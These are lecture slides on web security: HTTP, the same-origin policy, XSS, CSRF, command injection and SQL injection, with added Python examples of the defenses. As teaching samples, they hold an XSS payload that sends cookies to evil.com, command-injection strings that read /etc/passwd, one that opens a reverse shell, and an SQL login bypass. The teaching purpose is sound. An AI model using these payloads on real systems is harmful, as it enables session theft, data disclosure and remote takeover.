Web Security Fundamentals


These slides cover the networking stack and the application layer (HTTP requests, responses and status codes), trends in reported web vulnerabilities, and the main classes of web application flaws: broken authentication, same-origin policy bypasses, cross-site scripting, cross-site request forgery, command injection and SQL injection, with the standard defenses for each.

  • Web Security
  • Networking Stack
  • HTTP Protocol
  • Vulnerabilities
  • Authentication




Presentation Transcript


  1. Lecture 25: Web Security CS 181S Spring 2024

  2. Networking Stack
     Layer              Role                    Example
     7 - Application    Deliver content         HTTP
     6 - Presentation   Manage encoding
     5 - Session        Manage sessions         TLS/SSL
     4 - Transport      Deliver (un)reliably    TCP/UDP
     3 - Network        Deliver globally        IP
     2 - Data Link      Deliver locally         Ethernet
     1 - Physical       Deliver signals         0s and 1s

  3. Application Layer: HTTP
     Hypertext Transfer Protocol (HTTP) is an application protocol for distributed information systems.
     Stateless request-response protocol; requests resources identified by Uniform Resource Locators (URLs).
     Request methods and the response each asks for:
       GET     Retrieve resource (no side effects)
       HEAD    Retrieve the headers of the corresponding GET response (no body)
       POST    Requests that the server accept a new object (e.g., results of a form or a new database item) and store it as a subordinate of the resource identified by the URI
       PUT     Requests that the server store the new object under the supplied URI
       DELETE  Delete the specified resource

  4. Example Request (figure: an HTTP request, consisting of the request method, path and protocol version followed by headers; and an HTTP response, consisting of a header section and a body)

  5. HTTP Response Codes
     Code   Message
     200    OK
     201    Created
     302    Found
     401    Unauthorized
     403    Forbidden
     404    Not Found
     409    Conflict
     500    Internal Server Error
     502    Bad Gateway

  6. Vulnerabilities by Year (chart: number of reported vulnerabilities per year, y-axis 0 to 3500, one series each for DDoS, Overflow, XSS, CSRF and SQL injection)

  7. Vulnerability Occurrence in Applications (chart: percentage of applications, x-axis 0% to 90%, affected by each class: Injection (O1), CSRF, Broken Access Control (O5), Broken Authentication (O2), XSS (O7), Misconfigurations (O6); the O-numbers are the OWASP Top 10 ranks)

  8. Broken Authentication

  9. HTML
     <!DOCTYPE html>
     <html>
     <head>
       <meta charset="utf-8">
       <title>CS 181S - Fall 2018</title>
       <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,300i,600,700,700i' rel='stylesheet' type='text/css'>
       <link href='https://fonts.googleapis.com/css?family=Inconsolata:400,700,700i' rel='stylesheet' type='text/css'>
       <link href="resources/css/bootstrap.min.css" rel="stylesheet">
       <link rel="stylesheet" href="resources/css/main.css">
     </head>
     <body>
       <header class="site-header">
         <div class="navbar navbar-inverse navbar-fixed-top">
           <div class="container-fluid">
             <div class="navbar-header">
               <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
                 <span class="sr-only">Toggle navigation</span>
                 <span class="icon-bar"></span>
                 <span class="icon-bar"></span>
                 <span class="icon-bar"></span>
               </button>
               <a class="navbar-brand" href="/courses/cs5430/2018sp/">CS 181S
                 <span class="hidden-xs hidden-sm">: System Security</span>
                 <span class="hidden-md hidden-lg"> - Fall 2018</span>
               </a>
             </div>
           </div>
         </div>
       </header>
     </body>
     </html>

  10. Dynamic Web Pages
      Server-side: PHP, Ruby, Python, Java, Go
      Client-side: JavaScript

  11. Same Origin Policy (SOP)
      An origin is the (scheme, host, port) triple of a URL. Data for http://www.example.com/dir/page.html accessed by:
        http://www.example.com/dir/page2.html     allowed (only the path differs)
        http://www.example.com/dir2/page3.html    allowed (only the path differs)
        https://www.example.com/dir/page.html     blocked (scheme differs)
        http://www.example.com:81/dir/page.html   blocked (port differs)
        http://www.example.com:80/dir/page.html   allowed (80 is the default port for http)
        http://evil.com/dir/page.html             blocked (host differs)
        http://example.com/dir/page.html          blocked (host differs; a subdomain is a separate origin)

  12. SOP Exceptions
      Domain relaxation: document.domain
      Cross-origin network requests: Access-Control-Allow-Origin
      Cross-origin client-side communication: postMessage
      Importing scripts

  13. Cross-Site Scripting (XSS)
      Form of code injection: evil.com sends the victim a script that runs on example.com, i.e. in the victim's browser with example.com's origin, cookies and DOM.

  14. Reflected XSS (diagram: Attack Server, Victim and Victim Server with numbered message steps; the exchange is spelled out on the next two slides)

  15. Reflected XSS
      Search field on victim.com:
        http://victim.com/search.php?term=apple
      Server-side implementation of search.php (echoes the parameter unescaped):
        <html>
        <title> Search Results </title>
        <body> Results for <?php echo $_GET[term] ?>: ...</body>
        </html>
      What if the victim instead clicks on:
        http://victim.com/search.php?term=<script>window.open("http://evil.com/?cookie=" + document.cookie)</script>

  16. Reflected XSS (diagram)
      Attack Server (www.evil.com) supplies the link:
        http://victim.com/search.php?term=<script> ... </script>
      The victim's browser requests it, and Victim Server (www.victim.com) reflects the term into its response:
        <html> Results for <script> window.open(http://attacker.com? ... document.cookie ...) </script> </html>
      The script runs with victim.com's origin and sends document.cookie to the attacker.

  17. Stored XSS (diagram: step 1, the Attack Server injects a malicious script into the Victim Server; a User who later loads the page becomes the Victim)

  18. Stored XSS attack vectors
      Loaded images
      HTML attributes
      User content (comments, blog posts)

  19. Example XSS attacks

  20. XSS Defenses
      Parameter validation
      HTTP-only cookies
      Dynamic data tainting
      Static analysis
      Script sandboxing
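An added example (not the lecture's code) showing two of the defenses above against the reflected XSS of slide 15: the search page rewritten in Python once echoing the parameter verbatim, as the slide's `<?php echo $_GET[term] ?>` does, and once with HTML output encoding, plus a `Set-Cookie` header with `HttpOnly` so `document.cookie` cannot read the session cookie even if a script does run. The attack URL is constructed from the slide's payload; the template and function names are this example's own.

```python
"""Reflected XSS: verbatim echo beside HTML-escaped output, and an HttpOnly cookie.
Added example, a Python stand-in for the slide's search.php; not from the slides."""
import html
from urllib.parse import parse_qs, urlsplit

TEMPLATE = ("<html><title>Search Results</title>"
            "<body>Results for {term}: ...</body></html>")


def render_vulnerable(term: str) -> str:
    """Echoes the query parameter verbatim, as the slide's PHP does.
    Attacker-controlled markup becomes live HTML in the victim's browser."""
    return TEMPLATE.format(term=term)


def render_escaped(term: str) -> str:
    """Encodes & < > " ' so the browser renders the term as text.
    Equivalent to PHP's htmlspecialchars($term, ENT_QUOTES) in an HTML body context."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def term_from_url(url: str) -> str:
    """Extract ?term= from a request URL, as $_GET['term'] would (percent-decoded)."""
    return parse_qs(urlsplit(url).query).get("term", [""])[0]


# Constructed attack URL carrying the slide's payload, percent-encoded as a browser would send it:
# <script>window.open("http://evil.com/?cookie="+document.cookie)</script>
ATTACK_URL = ("http://victim.com/search.php?term="
              "%3Cscript%3Ewindow.open%28%22http%3A%2F%2Fevil.com%2F%3Fcookie%3D%22"
              "%2Bdocument.cookie%29%3C%2Fscript%3E")


def contains_script_tag(page: str) -> bool:
    """Crude check used only to show whether the payload survived as markup."""
    return "<script>" in page.lower()


def session_cookie_header(name: str, value: str) -> str:
    """Set-Cookie with HttpOnly (not readable via document.cookie), Secure
    (HTTPS only) and SameSite=Lax (not sent on most cross-site requests)."""
    return f"Set-Cookie: {name}={value}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    term = term_from_url(ATTACK_URL)
    print("vulnerable:", render_vulnerable(term))
    print("escaped:   ", render_escaped(term))
    print(session_cookie_header("session", "abc123"))
```

Escaping is context-specific: `html.escape` is right for text inside an element or a quoted attribute, but a value placed inside a `<script>` block, a URL, or CSS needs that context's encoding instead.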

  21. Cookies
      Cookies are small blocks of data stored locally by the web browser.
      A cookie is sent with every request to the domain that set it.
      Can be used to keep track of whether a user has authenticated (and as which user), and also other things.
      Can be set by third parties.

  22. Cross-Site Request Forgery (CSRF) (diagram: User, Victim Server and Attack Server, with steps 1 to 4 of a forged request issued by the user's browser)

  23. CSRF Defenses
      Secret validation token: <input type=hidden value=23a3af01b>
      Referer validation (the header is spelled Referer): Referer: http://www.facebook.com/home.php
      Custom HTTP header: X-Requested-By: XMLHttpRequest
      User interaction (e.g., CAPTCHA)
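The first three defenses on the slide as server-side checks, written as an added example (not the lecture's code). The token is derived from the session id with an HMAC under a server key so it need not be stored per form; the Referer/Origin check accepts only the site's own origin and rejects a missing header rather than trusting it; the custom-header check relies on the fact that a cross-site HTML form cannot set `X-Requested-By`. The site origin, session ids and request dictionaries are constructed for the example.

```python
"""CSRF defenses: HMAC-derived hidden token, Origin/Referer check, custom header.
Added example; not part of the lecture slides."""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Hypothetical site origin; the slide's Referer example uses this host.
SITE_ORIGIN = "https://www.facebook.com"
# Per-deployment secret generated at startup (constructed here, never hard-coded in practice).
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Value for the slide's <input type=hidden ...>: HMAC(server key, session id).
    Bound to the session, so one user's token is useless in another's session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_is_valid(session_id: str, submitted: str) -> bool:
    """Constant-time comparison. A forged cross-site POST cannot read the victim's
    token (same-origin policy), so it cannot supply the right value."""
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)


def referer_is_valid(headers: dict) -> bool:
    """Accept only when Origin (preferred) or Referer names our own origin.
    Some browsers and proxies strip Referer, so a missing header is rejected, not trusted."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    p = urlsplit(src)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def custom_header_present(headers: dict) -> bool:
    """A cross-site <form> cannot add this header; only script on our own origin
    (XMLHttpRequest/fetch) can, and CORS stops other origins from sending it."""
    return headers.get("X-Requested-By") == "XMLHttpRequest"


def accept_state_change(session_id: str, form: dict, headers: dict) -> bool:
    """Policy used in this example: the token is mandatory, and the request must
    also pass the origin check or carry the custom header (defense in depth)."""
    return (token_is_valid(session_id, form.get("csrf_token", ""))
            and (referer_is_valid(headers) or custom_header_present(headers)))


if __name__ == "__main__":
    sid = "session-42"
    token = issue_csrf_token(sid)
    legit = {"Referer": "https://www.facebook.com/home.php"}
    forged = {"Referer": "http://evil.com/attack.html"}
    print("legit  :", accept_state_change(sid, {"csrf_token": token}, legit))
    print("forged :", accept_state_change(sid, {"csrf_token": "23a3af01b"}, forged))
```

The `SameSite` cookie attribute (slide 21) is a complementary browser-side control; the token remains the check that does not depend on the browser's behaviour.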

  24. Command Injection
      Key issue: exporting local execution capability via a Web interface.
      Request:  http://vulnsite/ping?host=8.8.8.8
      Executes: ping -c 2 8.8.8.8
      Simple command injection
        Request:  http://vulnsite/ping?host=8.8.8.8;cat /etc/passwd
        Executes: ping -c 2 8.8.8.8;cat /etc/passwd
        Outputs the ping output and the contents of /etc/passwd
      Getting sneakier (other shell metacharacters that end or embed a command):
        ping -c 2 8.8.8.8|cat /etc/passwd
        ping -c 2 8.8.8.8&cat$IFS$9/etc/passwd
        ping -c 2 $(cat /etc/passwd)
        ping -c 2 <(bash -i >& /dev/tcp/10.0.0.1/443 0>&1)
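An added example (not the lecture's code) of the ping endpoint written three ways: the injectable shell string the slide describes, the same string with `shlex.quote` applied, and the preferred form that validates the host as an IP literal or hostname and passes an argument vector with no shell at all. The payload list is constructed from the slide's examples; the hostname regex and function names are this example's own.

```python
"""Command injection: shell string vs. quoted string vs. validated argv (no shell).
Added example; not part of the lecture slides."""
import ipaddress
import re
import shlex
import subprocess

# Hostname syntax per RFC 1123: dot-separated labels of letters, digits and
# hyphens, 1-63 chars each, 253 chars total. Anything else is rejected.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def vulnerable_shell_command(host: str) -> str:
    """The string the slide's endpoint hands to /bin/sh (os.system or shell=True).
    Every shell metacharacter in `host` is interpreted: ; | & $() <() and so on."""
    return f"ping -c 2 {host}"


def quoted_shell_command(host: str) -> str:
    """Second-best: shell-quote the argument so it stays one word. Correct only
    if the quoted string really is passed to a POSIX shell and nothing re-expands it."""
    return "ping -c 2 " + shlex.quote(host)


def validate_host(host: str) -> str:
    """Allow only an IP literal (v4 or v6) or a syntactically valid hostname."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"invalid host: {host!r}")


def safe_argv(host: str) -> list[str]:
    """Argument vector for subprocess.run(..., shell=False). No shell parses it,
    so even an unvalidated host would be a single argv element; validation
    additionally rejects anything that is not a host."""
    return ["ping", "-c", "2", validate_host(host)]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """Execute the validated command without a shell."""
    return subprocess.run(safe_argv(host), capture_output=True, text=True, check=False)


# Constructed payloads taken from the slide.
PAYLOADS = [
    "8.8.8.8;cat /etc/passwd",
    "8.8.8.8|cat /etc/passwd",
    "8.8.8.8&cat$IFS$9/etc/passwd",
    "$(cat /etc/passwd)",
    "<(bash -i >& /dev/tcp/10.0.0.1/443 0>&1)",
]


def rejected(payloads=PAYLOADS) -> list[str]:
    """Return the payloads that validate_host refuses."""
    out = []
    for p in payloads:
        try:
            validate_host(p)
        except ValueError:
            out.append(p)
    return out


if __name__ == "__main__":
    for p in PAYLOADS:
        print("shell :", vulnerable_shell_command(p))
        print("quoted:", quoted_shell_command(p))
    print("rejected by validation:", len(rejected()), "of", len(PAYLOADS))
```

The validated argv form is the one to ship: it removes the shell from the data path instead of trying to neutralise every metacharacter the shell knows.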

  25. SQL Injection
      SQL injection is another example of code injection: the adversary exploits user-controlled input to change the meaning of a database command.

  26. SQL Injection (diagram: Web Browser (Client) -> Web Server -> DB)
      Enter username & password; the server builds:
        SELECT * FROM Users WHERE user='me' AND pwd='1234'

  27. SQL Injection (diagram: Web Browser (Client) -> Web Server -> DB)
      What if user = ' or 1=1 --
      The server then builds:
        SELECT * FROM Users WHERE user='' or 1=1 --' AND pwd='1234'
      The comment marker removes the password check and 1=1 matches every row.

  28. SQLi in the Wild

  29. Defenses Against SQL Injection
      Prepared statements:
        String custname = request.getParameter("customerName");
        // perform input validation to detect attacks
        String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";
        PreparedStatement pstmt = connection.prepareStatement(query);
        pstmt.setString(1, custname);
        ResultSet results = pstmt.executeQuery();
      Input validation: case statements, cast to a non-string type
      Escaping user-supplied inputs: not recommended
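The login query from slides 26 and 27 run both ways against an in-memory SQLite database, as an added example (not the lecture's code): string concatenation, which the `' or 1=1 --` username bypasses, beside a parameterized query, where the same input is compared as a literal string and fails. The table contents are constructed for the example; the placeholder mechanism is the same one the slide's Java `PreparedStatement` uses.

```python
"""SQL injection: concatenated query beside a parameterized one, run on sqlite3.
Added example; not part of the lecture slides."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory Users table with one constructed row (user 'me', password '1234')."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    conn.execute("INSERT INTO Users VALUES ('me', '1234')")
    conn.commit()
    return conn


def rendered_query(user: str, pwd: str) -> str:
    """The SQL text the vulnerable path sends; shown so the injected comment is visible."""
    return f"SELECT * FROM Users WHERE user='{user}' AND pwd='{pwd}'"


def login_vulnerable(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Builds the slide's query by concatenation: the input becomes part of the
    statement, so `' or 1=1 --` ends the string, adds a tautology and comments
    out the password check."""
    return conn.execute(rendered_query(user, pwd)).fetchone() is not None


def login_prepared(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Placeholders: statement text and values travel separately, so the whole
    input is compared against the user column as one string and never parsed as SQL."""
    query = "SELECT * FROM Users WHERE user=? AND pwd=?"
    return conn.execute(query, (user, pwd)).fetchone() is not None


def account_by_id(conn: sqlite3.Connection, raw_id: str) -> tuple:
    """The slide's 'cast to a non-string type' defense for a numeric key:
    int() rejects anything that is not an integer before it reaches the query."""
    user_id = int(raw_id)  # raises ValueError on "1 or 1=1"
    return conn.execute("SELECT rowid, user FROM Users WHERE rowid=?", (user_id,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(rendered_query("' or 1=1 --", "wrong"))
    print("vulnerable login bypassed:", login_vulnerable(db, "' or 1=1 --", "wrong"))
    print("prepared login bypassed:  ", login_prepared(db, "' or 1=1 --", "wrong"))
```

Parameterization fixes values only; a user-controlled table or column name, or an ORDER BY direction, still has to be checked against an allow-list, which is what the slide's "case statements" point covers.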

  30. SQL Injection
